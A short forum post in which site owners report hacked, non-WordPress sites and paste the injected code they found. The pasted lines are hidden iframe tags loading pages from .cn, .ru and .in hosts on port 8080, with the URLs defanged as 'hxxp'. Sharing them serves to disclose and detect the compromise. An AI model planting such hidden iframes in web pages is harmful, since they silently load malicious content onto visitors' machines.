Code:
Just an FYI. It's not just Wordpress that is being exploited. I had the same issue on a non WordPress Site that got hacked.... Here was what i found in several of my files:
<iframe src="hxxp://cubanbigtop.cn:8080/index.ph
<iframe src="hxxp://c6y.ru:8080/index.p
<iframe src="hxxp://u3j.ru:8080/index.
<iframe src="hxxp://u5m.ru:8080/index
<iframe src="hxxp://q0j.ru:8080/inde
<iframe src="hxxp://u0b.in:8080/ts/in.cgi?pe
<iframe src="hxxp://x8b.in:8080/in
<iframe src="hxxp://x9m.in:8080/index.php" width=155 height=152 style="visibility: hidden"></iframe>
Yes, it is true. My YACG sites are also infected with the same shit.